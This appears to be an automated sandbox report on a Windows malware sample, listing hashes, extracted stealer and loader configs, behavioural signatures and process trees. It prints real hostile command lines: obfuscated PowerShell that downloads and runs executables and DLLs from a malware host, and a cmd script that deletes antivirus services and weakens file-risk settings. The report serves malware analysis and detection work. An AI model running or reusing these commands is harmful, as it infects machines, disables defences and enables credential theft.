Analysis
max time kernel: 105s
max time network: 164s
platform: windows10_x64
resource: win10v20210408
submitted: 12-08-2021 13:54

Static task: static1

Behavioral task: behavioral1
Sample: bfa1eae4dbb897d44aed1a349d7b66eb.exe
Resource: win7v20210410

Behavioral task: behavioral2
Sample: bfa1eae4dbb897d44aed1a349d7b66eb.exe
Resource: win10v20210408

General
Target: bfa1eae4dbb897d44aed1a349d7b66eb.exe
Size: 312KB
MD5: bfa1eae4dbb897d44aed1a349d7b66eb
SHA1: af2895ea60efb8f7ab997b1dd9f958a0d881fc9a
SHA256: 1202993e02cafc378caaea494d97555457f72369b6b94fcfd0202a4cbdf8a9c8
SHA512: 545544ab90c14adbd090dd1acfe157cf570f695631ecef18cd011a56286da264b0f000cee485199c1185258ac7aed2386a63fd0b3d89250d402e522202603c46
Malware Config

Extracted
https://www.rockonwest.best/Api/GetFile2

Extracted
smokeloader
2020
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
url4cnc: https://telete.in/jagressor_kz

Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
url4cnc: https://telete.in/p1rosto100xx
Signatures

DcRat
DarkCrystal (DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

Detected phishing page

Process spawned unexpected child process (8 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3608 | 1860 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4176 | 1860 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4224 | 1860 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4252 | 1860 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4284 | 1860 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4312 | 1860 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4364 | 1860 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4400 | 1860 | schtasks.exe
Raccoon Stealer Payload (5 IoCs)
Processes:
resource | yara_rule
behavioral2/memory/1912-166-0x0000000000400000-0x0000000000943000-memory.dmp | family_raccoon
behavioral2/memory/1912-165-0x0000000000B00000-0x0000000000B91000-memory.dmp | family_raccoon
behavioral2/memory/4204-274-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon
behavioral2/memory/4204-275-0x000000000044003F-mapping.dmp | family_raccoon
behavioral2/memory/4204-283-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon
SmokeLoader
Modular backdoor trojan in use since 2014.

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\C9C0.exe | dcrat
C:\Users\Admin\AppData\Local\Temp\C9C0.exe | dcrat
C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe | dcrat
C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe | dcrat
C:\Users\Admin\AppData\Local\Temp\234.exe | dcrat
C:\Users\Admin\AppData\Local\Temp\234.exe | dcrat
C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe | dcrat
C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe | dcrat
XMRig Miner Payload (2 IoCs)
Processes:
resource | yara_rule
behavioral2/memory/4628-573-0x00000001402F327C-mapping.dmp | xmrig
behavioral2/memory/4628-575-0x0000000140000000-0x0000000140763000-memory.dmp | xmrig

Blocklisted process makes network request (1 IoCs)
Processes:
flow | pid | process
876 | 2112 | powershell.exe
Downloads MZ/PE file

Executes dropped EXE (17 IoCs)
Processes:
pid | process
2116 | C401.exe
1392 | C838.exe
3904 | C9C0.exe
3148 | CCDE.exe
4068 | Runtimebroker.exe
812 | D1F0.exe
1912 | DD5B.exe
3948 | E4CE.exe
512 | reviewbrokercrtCommonsessionperfDll.exe
2904 | proliv.sfx.exe
1768 | proliv.exe
3528 | 26.exe
3456 | 234.exe
4472 | conhost.exe
4204 | D1F0.exe
1612 | services64.exe
4008 | sihost64.exe

Deletes itself (1 IoCs)
Processes:
pid | process
3028
Drops startup file (3 IoCs)
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe | cmd.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk | Runtimebroker.exe

Loads dropped DLL (6 IoCs)
Processes:
pid | process
1912 | DD5B.exe
1912 | DD5B.exe
1912 | DD5B.exe
1912 | DD5B.exe
1912 | DD5B.exe
4204 | D1F0.exe
Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 9 IoCs)
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\schemas\\AvailableNetwork\\explorer.exe\"" | reviewbrokercrtCommonsessionperfDll.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\System32\\wbem\\NetTCPIP_Uninstall\\WmiPrvSE.exe\"" | reviewbrokercrtCommonsessionperfDll.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Program Files\\7-Zip\\Lang\\WmiPrvSE.exe\"" | reviewbrokercrtCommonsessionperfDll.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Windows\\System32\\ddptrace\\taskhostw.exe\"" | reviewbrokercrtCommonsessionperfDll.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Windows\\System32\\KBDTH3\\spoolsv.exe\"" | reviewbrokercrtCommonsessionperfDll.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Windows\\System32\\C_1142\\SppExtComObj.exe\"" | reviewbrokercrtCommonsessionperfDll.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\odt\\dllhost.exe\"" | reviewbrokercrtCommonsessionperfDll.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\"" | reviewbrokercrtCommonsessionperfDll.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('https://www.rockonwest.best/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" | powershell.exe
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
38 | ipinfo.io
39 | ipinfo.io

Drops file in System32 directory (8 IoCs)
Processes:
description | ioc | process
File created | C:\Windows\System32\ddptrace\ea9f0e6c9e2dcd4dfacdaf29ba21541fb815a988 | reviewbrokercrtCommonsessionperfDll.exe
File created | C:\Windows\System32\wbem\NetTCPIP_Uninstall\WmiPrvSE.exe | reviewbrokercrtCommonsessionperfDll.exe
File created | C:\Windows\System32\wbem\NetTCPIP_Uninstall\24dbde2999530ef5fd907494bc374d663924116c | reviewbrokercrtCommonsessionperfDll.exe
File created | C:\Windows\System32\KBDTH3\spoolsv.exe | reviewbrokercrtCommonsessionperfDll.exe
File created | C:\Windows\System32\KBDTH3\f3b6ecef712a24f33798f5d2fb3790c3d9b894c4 | reviewbrokercrtCommonsessionperfDll.exe
File created | C:\Windows\System32\C_1142\SppExtComObj.exe | reviewbrokercrtCommonsessionperfDll.exe
File created | C:\Windows\System32\C_1142\e1ef82546f0b02b7e974f28047f3788b1128cce1 | reviewbrokercrtCommonsessionperfDll.exe
File created | C:\Windows\System32\ddptrace\taskhostw.exe | reviewbrokercrtCommonsessionperfDll.exe
Suspicious use of SetThreadContext (3 IoCs)
Processes:
description | pid | process | target process
PID 3728 set thread context of 2524 | 3728 | bfa1eae4dbb897d44aed1a349d7b66eb.exe | bfa1eae4dbb897d44aed1a349d7b66eb.exe
PID 812 set thread context of 4204 | 812 | D1F0.exe | D1F0.exe
PID 1612 set thread context of 4628 | 1612 | services64.exe | explorer.exe

Drops file in Program Files directory (4 IoCs)
Processes:
description | ioc | process
File created | C:\Program Files\7-Zip\Lang\WmiPrvSE.exe | reviewbrokercrtCommonsessionperfDll.exe
File created | C:\Program Files\7-Zip\Lang\24dbde2999530ef5fd907494bc374d663924116c | reviewbrokercrtCommonsessionperfDll.exe
File created | C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe | reviewbrokercrtCommonsessionperfDll.exe
File created | C:\Program Files (x86)\Microsoft.NET\RedistList\088424020bedd6b28ac7fd22ee35dcd7322895ce | reviewbrokercrtCommonsessionperfDll.exe

Drops file in Windows directory (3 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Windows\schemas\AvailableNetwork\explorer.exe | reviewbrokercrtCommonsessionperfDll.exe
File created | C:\Windows\schemas\AvailableNetwork\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 | reviewbrokercrtCommonsessionperfDll.exe
File created | C:\Windows\schemas\AvailableNetwork\explorer.exe | reviewbrokercrtCommonsessionperfDll.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (1 IoCs)
Processes:
pid | pid_target | process | target process
4792 | 4204 | WerFault.exe | D1F0.exe
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | bfa1eae4dbb897d44aed1a349d7b66eb.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | bfa1eae4dbb897d44aed1a349d7b66eb.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | bfa1eae4dbb897d44aed1a349d7b66eb.exe

Creates scheduled task(s) (1 TTPs, 10 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
4284 | schtasks.exe
4364 | schtasks.exe
4400 | schtasks.exe
4376 | schtasks.exe
5096 | schtasks.exe
3608 | schtasks.exe
4176 | schtasks.exe
4252 | schtasks.exe
4224 | schtasks.exe
4312 | schtasks.exe

Modifies registry class (1 IoCs)
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings | C9C0.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes:
pid | process
3028
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Suspicious use of SetWindowsHookEx (1 IoCs)
Processes:
pid | process
2116 | C401.exe

Suspicious use of UnmapMainImage (1 IoCs)
Processes:
pid | process
3028
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Processes

C:\Users\Admin\AppData\Local\Temp\bfa1eae4dbb897d44aed1a349d7b66eb.exe (depth 1)
Command line: "C:\Users\Admin\AppData\Local\Temp\bfa1eae4dbb897d44aed1a349d7b66eb.exe"
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID: 3728

C:\Users\Admin\AppData\Local\Temp\bfa1eae4dbb897d44aed1a349d7b66eb.exe (depth 2)
Command line: "C:\Users\Admin\AppData\Local\Temp\bfa1eae4dbb897d44aed1a349d7b66eb.exe"
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID: 2524

C:\Users\Admin\AppData\Local\Temp\C401.exe (depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\C401.exe
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID: 2116

C:\Users\Admin\AppData\Local\Temp\C838.exe (depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\C838.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID: 1392

C:\ProgramData\Runtimebroker.exe (depth 2)
Command line: "C:\ProgramData\Runtimebroker.exe"
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
PID: 4068

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
Command line: powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''https://www.rockonwest.best/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID: 3200

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
Command line: powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('https://www.rockonwest.best/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
- Blocklisted process makes network request
PID: 2112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 4)
Command line: "powershell" Get-MpPreference -verbose
PID: 4576
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete 
"HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t 
REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d 
"%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete 
